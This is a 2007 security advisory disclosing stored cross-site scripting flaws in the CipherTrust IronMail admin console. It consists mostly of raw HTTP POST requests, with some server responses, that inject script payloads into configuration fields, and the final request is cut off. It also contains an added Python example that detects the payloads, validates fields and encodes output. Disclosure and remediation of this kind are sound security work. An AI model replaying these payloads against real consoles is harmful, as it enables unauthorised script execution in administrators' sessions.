Multiple XSS in IronMail Mar 26 2007 09:23AM
Javier Olascoaga (deese spezialk net)
Found multiple XSS in IronMail.

See attached advisory. Spanish version in http://www.514.es.

Regards,

- J
===============================
- Advisory -
===============================

Title: Multiple XSS in CipherTrust IronMail 6.1.1
Risk: Medium
Date: 20.Feb.2007
Author: Javier Olascoaga <jolascoaga *at* 514.es>
WEB: http://www.514.es/

.: [ INTRO ] :.

IronMail protects enterprise email systems from inbound threats: spam, viruses;
or hackers trying to take down or take over the e-mail system. IronMail protects
enterprise email systems from outbound threats: regulatory compliance violations,
corporate policy violations, or theft ("leakage") of confidential information
or intellectual property. IronMail protects enterprise email systems from
threats that haven't even been identified yet.

.: [ TECHNICAL DESCRIPTION ] :.

During technical testing of the IronMail mail system, several Cross Site
Scripting vulnerabilities were detected in the administration console of the
product.

The XSS issues found are listed below:

.: [ XSS #1 ] :.

POST https://172.0.0.2:10443/admin/systemRouting.do?method=submit HTTP/1.1
Referer:
https://172.0.0.2:10443/admin/systemRouting.do?method=init&isMenuToggled
=1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR
2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13
Host: 172.0.0.2:10443
Content-Length: 295
Cache-Control: no-cache
Cookie: CTSecureToken=53DFBE4753D221B2707050E96902E98D_admin;
itemToHighlight=https%3A//172.0.0.2%3A10443/admin/systemRouting.do%3Fmet
hod%3Dinit%26isMenuToggled%3D1;
menusToExpand=%2CConfigurationMenu%2C; tabbedMenuSelected=11;
/admin/queueManager.dofirsttimeload=1; /admin/queueManager.do=;
JSESSIONID=B227892A258E91419C09469E49AED4D4
rows%5B0%5D.networkId=172.16.0.0&rows%5B0%5D.netmaskId=255.255.0.0&rows
%5B1%5D.networkId=192.168.0.0&rows%5B1%5D.netmaskId=255.255.0.0&network=
%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&netmask=128.0.0.0&
defRouterIp=%27%3E%3Cscript%3Ealert%28%27SIA2%27%29%3C%2Fscript%3E&submi
t=Submit

.: [ XSS #2 ] :.

POST https://172.0.0.2:10443/admin/system_IronMail.do?method=saveNew HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, */*
Referer:
https://172.0.0.2:10443/admin/system_IronMail.do?method=getDetail&isMenu
Toggled=1
Accept-Language: es-ES,en-us;q=0.5
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR
2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13
Host: 172.0.0.2:10443
Content-Length: 343
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin;
tabbedMenuSelected=17;
itemToHighlight=https%3A//172.0.0.2%3A10443/admin/system_IronMail.do%3Fm
ethod%3DgetDetail%26isMenuToggled%3D1;
menusToExpand=%2CConfigurationMenu%2C;
JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E
mtu=1500&hostName=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E
&domainName=sytes.net&ipAddress=10.1.1.1&ipNetMask=255.255.255.224&defau
ltRouter=10.1.1.2&dns1=10.1.1.3&dns2=10.1.1.4&dns3=10.1.1.5&ntp1=time.ni
st.gov&ntp2=bitsy.mit.edu&ntp3=clock.isc.org&timeZone=Europe%2FMadrid&et
hernetSetting=autoselect&submit=Submit
HTTP/1.0 200 OK
Date: Mon, 19 Feb 2007 10:11:46 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html; charset=utf-8

.: [ XSS #3 ] :.

POST https://172.0.0.2:10443/admin/system_IronMail.do?method=saveNew HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, */*
Referer: https://172.0.0.2:10443/admin/system_IronMail.do?method=saveNew
Accept-Language: es-ES,en-us;q=0.5
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR
2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13
Host: 172.0.0.2:10443
Content-Length: 341
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin;
tabbedMenuSelected=17;
itemToHighlight=https%3A//172.0.0.2%3A10443/admin/system_IronMail.do%3Fm
ethod%3DsaveNew;
menusToExpand=%2CConfigurationMenu%2C;
JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E
mtu=1500&hostName=mmail11&domainName=%27%3E%3Cscript%3Ealert%28%27SIA%2
7%29%3C%2Fscript%3E&ipAddress=10.1.1.1&ipNetMask=255.255.255.224&default
Router=10.1.1.2&dns1=10.1.1.3&dns2=10.1.1.4&dns3=10.1.1.5&ntp1=time.nist
.gov&ntp2=bitsy.mit.edu&ntp3=clock.isc.org&timeZone=Europe%2FMadrid&ethe
rnetSetting=autoselect&submit=Submit
HTTP/1.0 200 OK
Date: Mon, 19 Feb 2007 10:12:26 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html; charset=utf-8

.: [ XSS #4 ] :.

POST https://172.0.0.2:10443/admin/system_IronMail.do?method=saveNew HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, */*
Referer: https://172.0.0.2:10443/admin/system_IronMail.do?method=saveNew
Accept-Language: es-ES,en-us;q=0.5
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR
2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13
Host: 172.0.0.2:10443
Content-Length: 337
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin;
tabbedMenuSelected=17;
itemToHighlight=https%3A//172.0.0.2%3A10443/admin/system_IronMail.do%3Fm
ethod%3DsaveNew;
menusToExpand=%2CConfigurationMenu%2C;
JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E
mtu=1500&hostName=mmail11&domainName=sytes.net&ipAddress=%27%3E%3Cscrip
t%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&ipNetMask=255.255.255.224&defaul
tRouter=10.1.1.2&dns1=10.1.1.3&dns2=10.1.1.4&dns3=10.1.1.5&ntp1=time.nis
t.gov&ntp2=bitsy.mit.edu&ntp3=clock.isc.org&timeZone=Europe%2FMadrid&eth
ernetSetting=autoselect&submit=Submit
HTTP/1.0 200 OK
Date: Mon, 19 Feb 2007 10:12:31 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html; charset=utf-8

.: [ XSS #5 ] :.

POST https://172.0.0.2:10443/admin/system_IronMail.do?method=saveNew HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, */*
Referer: https://172.0.0.2:10443/admin/system_IronMail.do?method=saveNew
Accept-Language: es-ES,en-us;q=0.5
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR
2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13
Host: 172.0.0.2:10443
Content-Length: 337
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin;
tabbedMenuSelected=17;
itemToHighlight=https%3A//172.0.0.2%3A10443/admin/system_IronMail.do%3Fm
ethod%3DsaveNew;
menusToExpand=%2CConfigurationMenu%2C;
JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E
mtu=1500&hostName=mmail11&domainName=sytes.net&ipAddress=10.1.1.1&ipNet
Mask=255.255.255.224&defaultRouter=%27%3E%3Cscript%3Ealert%28%27SIA%27%2
9%3C%2Fscript%3E&dns1=10.1.1.3&dns2=10.1.1.4&dns3=10.1.1.5&ntp1=time.nis
t.gov&ntp2=bitsy.mit.edu&ntp3=clock.isc.org&timeZone=Europe%2FMadrid&eth
ernetSetting=autoselect&submit=Submit
HTTP/1.0 200 OK
Date: Mon, 19 Feb 2007 10:12:36 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html; charset=utf-8

.: [ XSS #6 ] :.

POST https://172.0.0.2:10443/admin/system_IronMail.do?method=saveNew HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, */*
Referer: https://172.0.0.2:10443/admin/system_IronMail.do?method=saveNew
Accept-Language: es-ES,en-us;q=0.5
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR
2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13
Host: 172.0.0.2:10443
Content-Length: 338
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin;
tabbedMenuSelected=17;
itemToHighlight=https%3A//172.0.0.2%3A10443/admin/system_IronMail.do%3Fm
ethod%3DsaveNew;
menusToExpand=%2CConfigurationMenu%2C;
JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E
mtu=1500&hostName=mmail11&domainName=sytes.net&ipAddress=10.1.1.1&ipNet
Mask=255.255.255.224&defaultRouter=10.1.1.2&dns1=%27%3E%3Cscript%3Ealert
%28%27SIA%27%29%3C%2Fscript%3E&dns2=10.1.1.4&dns3=10.1.1.5&ntp1=time.nis
t.gov&ntp2=bitsy.mit.edu&ntp3=clock.isc.org&timeZone=Europe%2FMadrid&eth
ernetSetting=autoselect&submit=Submit
HTTP/1.0 200 OK
Date: Mon, 19 Feb 2007 10:12:41 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html; charset=utf-8

.: [ XSS #7 ] :.

POST https://172.0.0.2:10443/admin/system_IronMail.do?method=saveNew HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, */*
Referer: https://172.0.0.2:10443/admin/system_IronMail.do?method=saveNew
Accept-Language: es-ES,en-us;q=0.5
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR
2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13
Host: 172.0.0.2:10443
Content-Length: 340
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin;
tabbedMenuSelected=17;
itemToHighlight=https%3A//172.0.0.2%3A10443/admin/system_IronMail.do%3Fm
ethod%3DsaveNew;
menusToExpand=%2CConfigurationMenu%2C;
JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E
mtu=1500&hostName=mmail11&domainName=sytes.net&ipAddress=10.1.1.1&ipNet
Mask=255.255.255.224&defaultRouter=10.1.1.2&dns1=10.1.1.3&dns2=%27%3E%3C
script%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&dns3=10.1.1.5&ntp1=time.nis
t.gov&ntp2=bitsy.mit.edu&ntp3=clock.isc.org&timeZone=Europe%2FMadrid&eth
ernetSetting=autoselect&submit=Submit
HTTP/1.0 200 OK
Date: Mon, 19 Feb 2007 10:12:48 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html; charset=utf-8

.: [ XSS #8 ] :.

POST https://172.0.0.2:10443/admin/systemOutOfBand.do?method=saveNew HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, */*
Referer:
https://172.0.0.2:10443/admin/systemOutOfBand.do?method=getDetail&isMenu
Toggled=1
Accept-Language: es-ES,en-us;q=0.5
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR
2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13
Host: 172.0.0.2:10443
Content-Length: 154
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin;
tabbedMenuSelected=17;
itemToHighlight=https%3A//172.0.0.2%3A10443/admin/systemOutOfBand.do%3Fm
ethod%3DgetDetail%26isMenuToggled%3D1;
menusToExpand=%2CConfigurationMenu%2C;
JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E
outOfBand=true&mtu=1500&ipAddress=%27%3E%3Cscript%3Ealert%28%27SIA%27%29
%3C%2Fscript%3E&ethernetSetting=autoselect&ipNetMask=255.255.255.224&sub
mit=Submit
HTTP/1.0 200 OK
Date: Mon, 19 Feb 2007 10:13:16 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html; charset=utf-8
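
Added example, not part of the original advisory and not the product's code: it decodes the XSS #8 form body to show which field carries markup, then contrasts unencoded output with per-field validation plus attribute-context encoding. The single-quoted input template and the validator table are assumptions; the advisory does not show the console's markup, only a test string that begins with '>.

```python
import html
import ipaddress
import re
from urllib.parse import parse_qsl

# Form body copied from the XSS #8 request above, with the line wraps joined.
XSS8_BODY = (
    "outOfBand=true&mtu=1500&ipAddress=%27%3E%3Cscript%3Ealert%28%27SIA%27%29"
    "%3C%2Fscript%3E&ethernetSetting=autoselect&ipNetMask=255.255.255.224&sub"
    "mit=Submit"
)

# Characters that can close a quoted attribute value or open a tag.
HTML_META = re.compile(r"[<>\"']")


def flag_markup_params(body):
    """Return (name, decoded value) for every field whose value contains HTML metacharacters."""
    return [
        (name, value)
        for name, value in parse_qsl(body, keep_blank_values=True)
        if HTML_META.search(value)
    ]


def render_unsafe(name, value):
    """Assumed template: the submitted value is echoed into a single-quoted attribute as-is."""
    return "<input type='text' name='%s' value='%s'>" % (name, value)


def render_encoded(name, value):
    """Same assumed template, with output encoding suited to a quoted attribute."""
    return "<input type='text' name='%s' value='%s'>" % (
        html.escape(name, quote=True),
        html.escape(value, quote=True),
    )


def is_ipv4(value):
    """True only for a dotted-quad IPv4 literal."""
    try:
        ipaddress.IPv4Address(value)
        return True
    except ValueError:
        return False


# Hypothetical validator table for the out-of-band form; field names come from
# the request above, the accepted formats are assumptions.
VALIDATORS = {
    "ipAddress": is_ipv4,
    "ipNetMask": is_ipv4,
    "mtu": str.isdigit,
}


def process_form(body):
    """Validate typed fields, then encode everything that is echoed back.

    Returns (rejected field names, {field name: rendered HTML}).
    Rejected values are never rendered.
    """
    rejected, rendered = [], {}
    for name, value in parse_qsl(body, keep_blank_values=True):
        check = VALIDATORS.get(name)
        if check is not None and not check(value):
            rejected.append(name)
            continue
        rendered[name] = render_encoded(name, value)
    return rejected, rendered


if __name__ == "__main__":
    for name, value in flag_markup_params(XSS8_BODY):
        print("field with markup:", name, "=", value)
        print("unencoded:", render_unsafe(name, value))
        print("encoded:  ", render_encoded(name, value))
    print("rejected by validation:", process_form(XSS8_BODY)[0])
```

Validation alone would not cover free-text fields such as hostName or license from the other requests, which is why the encoding step is applied to every echoed value.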

.: [ XSS #9 ] :.

POST https://172.0.0.2:10443/admin/systemBackup.do?method=submit HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, */*
Referer:
https://172.0.0.2:10443/admin/systemBackup.do?method=init&isMenuToggled=
1
Accept-Language: es-ES,en-us;q=0.5
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR
2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13
Host: 172.0.0.2:10443
Content-Length: 146
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin;
tabbedMenuSelected=17;
itemToHighlight=https%3A//172.0.0.2%3A10443/admin/systemBackup.do%3Fmeth
od%3Dinit%26isMenuToggled%3D1;
menusToExpand=%2CConfigurationMenu%2C;
JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E
password=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&confirmPa
ssword=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&submit=Subm
it
HTTP/1.0 200 OK
Date: Mon, 19 Feb 2007 10:13:41 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html; charset=utf-8

.: [ XSS #10 ] :.

POST https://172.0.0.2:10443/admin/systemLicenseManager.do?method=submit
HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, */*
Referer:
https://172.0.0.2:10443/admin/systemLicenseManager.do?method=init&isMenu
Toggled=1
Accept-Language: es-ES,en-us;q=0.5
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR
2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13
Host: 172.0.0.2:10443
Content-Length: 75
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin;
tabbedMenuSelected=17;
itemToHighlight=https%3A//172.0.0.2%3A10443/admin/systemLicenseManager.d
o%3Fmethod%3Dinit%26isMenuToggled%3D1;
menusToExpand=%2CConfigurationMenu%2C;
JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E
license=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&submit=Su
bmit
HTTP/1.0 200 OK
Date: Mon, 19 Feb 2007 10:20:28 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html; charset=utf-8

.: [ XSS #11 ] :.

POST https://172.0.0.2:10443/admin/systemWebAdminConfig.do?method=save
HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, */*
Referer:
https://172.0.0.2:10443/admin/systemWebAdminConfig.do?method=init&isMenu
Toggled=1&procId=90
Accept-Language: es-ES,en-us;q=0.5
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR
2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13
Host: 172.0.0.2:10443
Content-Length: 1225
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin;
tabbedMenuSelected=15;
itemToHighlight=https%3A//172.0.0.2%3A10443/admin/systemWebAdminConfig.d
o%3Fmethod%3Dinit%26isMenuToggled%3D1%26procId%3D90;
menusToExpand=%2CConfigurationMenu%2CWebAdminConfigurationMenu%2CUserAcc
ountMenu%2C;
JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E
procId=90&rows%5B0%5D.attrName=gui_log_level&rows%5B0%5D.attrType=12&row
s%5B0%5D.attrValidate=%5BLabelValueBean%5BCRITICAL%2C+1%5D%2C+LabelValue
Bean%5BERROR%2C+4%5D%2C+LabelValueBean%5BINFORMATION%2C+5%5D%2C+LabelVal
ueBean%5BDETAILED%2C+6%5D%5D&rows%5B0%5D.attrValidateStr=30060003%3A1%2C
30060004%3A4%2C30060005%3A5%2C30060006%3A6&rows%5B0%5D.attrDepends=&rows
%5B0%5D.multipleValue=0&rows%5B0%5D.modifyable=true&rows%5B0%5D.attrValu
eStrClone=4&rows%5B0%5D.langTagId=2000003&rows%5B0%5D.attrValue=4&rows%5
B1%5D.attrName=gui_timeout&rows%5B1%5D.attrType=2&rows%5B1%5D.attrValida
te=%5B1-30%5D&rows%5B1%5D.attrValidateStr=%5B1-30%5D&rows%5B1%5D.attrDep
ends=&rows%5B1%5D.multipleValue=0&rows%5B1%5D.modifyable=true&rows%5B1%5
D.attrValueStrClone=30&rows%5B1%5D.langTagId=2001014&rows%5B1%5D.attrVal
ueStr=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&rows%5B2%5D.
attrName=auto_refresh&rows%5B2%5D.attrType=2&rows%5B2%5D.attrValidate=%5
B1-30%5D&rows%5B2%5D.attrValidateStr=%5B1-30%5D&rows%5B2%5D.attrDepends=
&rows%5B2%5D.multipleValue=0&rows%5B2%5D.modifyable=true&rows%5B2%5D.att
rValueStrClone=4&rows%5B2%5D.langTagId=2001017&rows%5B2%5D.attrValueStr=
%27%3E%3Cscript%3Ealert%28%27SIA2%27%29%3C%2Fscript%3E&submitValue=Submi
t
HTTP/1.0 200 OK
Date: Mon, 19 Feb 2007 10:21:27 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html; charset=utf-8

.: [ XSS #12 ] :.

POST
https://172.0.0.2:10443/admin/ldap_ConfigureServiceProperties.do?method=
save
HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, */*
Referer:
https://172.0.0.2:10443/admin/ldap_ConfigureServiceProperties.do?method=
init&procId=164
Accept-Language: es-ES,en-us;q=0.5
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR
2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13
Host: 172.0.0.2:10443
Content-Length: 2840
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin;
tabbedMenuSelected=11;
itemToHighlight=https%3A//172.0.0.2%3A10443/admin/ldap_ConfigureServiceP
roperties.do%3Fmethod%3Dinit%26procId%3D164;
menusToExpand=%2CConfigurationMenu%2CWebAdminConfigurationMenu%2CUserAcc
ountMenu%2CUserPreferenceMenu%2CAlertManagerMenu%2CMailFirewallMenu%2CLD
APConfigurationMenu%2C;
/admin/dnsProtection.dofirsttimeload=1; /admin/dnsProtection.do=;
JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E
procId=164&rows%5B0%5D.attrName=sync_time&rows%5B0%5D.attrType=2&rows%5B
0%5D.attrValidate=%5B1-24%5D&rows%5B0%5D.attrValidateStr=%5B1-24%5D&rows
%5B0%5D.attrDepends=&rows%5B0%5D.multipleValue=0&rows%5B0%5D.modifyable=
true&rows%5B0%5D.attrValueStrClone=24&rows%5B0%5D.langTagId=2016401&rows
%5B0%5D.attrValueStr=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%
3E&rows%5B1%5D.attrName=sync_results_count&rows%5B1%5D.attrType=2&rows%5
B1%5D.attrValidate=%5B1-500%5D&rows%5B1%5D.attrValidateStr=%5B1-500%5D&r
ows%5B1%5D.attrDepends=&rows%5B1%5D.multipleValue=0&rows%5B1%5D.modifyab
le=true&rows%5B1%5D.attrValueStrClone=50&rows%5B1%5D.langTagId=2016402&r
ows%5B1%5D.attrValueStr=50&rows%5B2%5D.attrName=sync_rules_order&rows%5B
2%5D.attrType=1&rows%5B2%5D.attrValidate=&rows%5B2%5D.attrValidateStr=&r
ows%5B2%5D.attrDepends=&rows%5B2%5D.multipleValue=1&rows%5B2%5D.modifyab
le=true&rows%5B2%5D.attrValueStrClone=&rows%5B2%5D.langTagId=2016403&row
s%5B2%5D.attrValue=&rows%5B3%5D.attrName=ldap_fail_open&rows%5B3%5D.attr
Type=5&rows%5B3%5D.attrValidate=&rows%5B3%5D.attrValidateStr=&rows%5B3%5
D.attrDepends=&rows%5B3%5D.multipleValue=0&rows%5B3%5D.modifyable=true&r
ows%5B3%5D.attrValueStrClone=1&rows%5B3%5D.langTagId=2016404&rows%5B3%5D
.attrValue=true&rows%5B4%5D.attrName=ldap_failure_count&rows%5B4%5D.attr
Type=2&rows%5B4%5D.attrValidate=%5B1-50%5D&rows%5B4%5D.attrValidateStr=%
5B1-50%5D&rows%5B4%5D.attrDepends=&rows%5B4%5D.multipleValue=0&rows%5B4%
5D.modifyable=true&rows%5B4%5D.attrValueStrClone=3&rows%5B4%5D.langTagId
=2016405&rows%5B4%5D.attrValueStr=3&rows%5B5%5D.attrName=ldap_monitor_in
tvl&rows%5B5%5D.attrType=2&rows%5B5%5D.attrValidate=%5B1-1440%5D&rows%5B
5%5D.attrValidateStr=%5B1-1440%5D&rows%5B5%5D.attrDepends=&rows%5B5%5D.m
ultipleValue=0&rows%5B5%5D.modifyable=true&rows%5B5%5D.attrValueStrClone
=5&rows%5B5%5D.langTagId=2016406&rows%5B5%5D.attrValueStr=5&rows%5B6%5D.
attrName=ldap_alert_type&rows%5B6%5D.attrType=12&rows%5B6%5D.attrValidat
e=%5BLabelValueBean%5BNo+Alert%2C+0%5D%2C+LabelValueBean%5BRESTART%2C+1%
5D%2C+LabelValueBean%5BSHUTDOWN%2C+2%5D%2C+LabelValueBean%5BCRITICAL%2C+
3%5D%2C+LabelValueBean%5BERROR%2C+4%5D%2C+LabelValueBean%5BWARNING%2C+5%
5D%2C+LabelValueBean%5BNOTIFICATION%2C+6%5D%2C+LabelValueBean%5BINFORMAT
ION%2C+7%5D%5D&rows%5B6%5D.attrValidateStr=30060019%3A0%2C30060007%3A1%2
C30060008%3A2%2C30060003%3A3%2C30060004%3A4%2C30060009%3A5%2C30060010%3A
6%2C30060005%3A7&rows%5B6%5D.attrDepends=&rows%5B6%5D.multipleValue=0&ro
ws%5B6%5D.modifyable=true&rows%5B6%5D.attrValueStrClone=3&rows%5B6%5D.la
ngTagId=2016407&rows%5B6%5D.attrValue=3&rows%5B7%5D.attrName=ldap_route_
aft_masq&rows%5B7%5D.attrType=5&rows%5B7%5D.attrValidate=&rows%5B7%5D.at
trValidateStr=&rows%5B7%5D.attrDepends=&rows%5B7%5D.multipleValue=0&rows
%5B7%5D.modifyable=true&rows%5B7%5D.attrValueStrClone=0&rows%5B7%5D.lang
TagId=2016408&submitValue=Submit
HTTP/1.0 200 OK
Date: Mon, 19 Feb 2007 10:22:51 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html; charset=utf-8

.: [ XSS #13 ] :.

POST
https://172.0.0.2:10443/admin/ldap_ConfigureServiceProperties.do?method=
save
HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, */*
Referer:
https://172.0.0.2:10443/admin/ldap_ConfigureServiceProperties.do?method=
save
Accept-Language: es-ES,en-us;q=0.5
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR
2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13
Host: 172.0.0.2:10443
Content-Length: 2840
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin;
tabbedMenuSelected=11;
itemToHighlight=https%3A//172.0.0.2%3A10443/admin/ldap_ConfigureServiceP
roperties.do%3Fmethod%3Dinit%26procId%3D164;
menusToExpand=%2CConfigurationMenu%2CWebAdminConfigurationMenu%2CUserAcc
ountMenu%2CUserPreferenceMenu%2CAlertManagerMenu%2CMailFirewallMenu%2CLD
APConfigurationMenu%2C;
/admin/dnsProtection.dofirsttimeload=1; /admin/dnsProtection.do=;
JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E
procId=164&rows%5B0%5D.attrName=sync_time&rows%5B0%5D.attrType=2&rows%5B
0%5D.attrValidate=%5B1-24%5D&rows%5B0%5D.attrValidateStr=%5B1-24%5D&rows
%5B0%5D.attrDepends=&rows%5B0%5D.multipleValue=0&rows%5B0%5D.modifyable=
true&rows%5B0%5D.attrValueStrClone=24&rows%5B0%5D.langTagId=2016401&rows
%5B0%5D.attrValueStr=24&rows%5B1%5D.attrName=sync_results_count&rows%5B1
%5D.attrType=2&rows%5B1%5D.attrValidate=%5B1-500%5D&rows%5B1%5D.attrVali
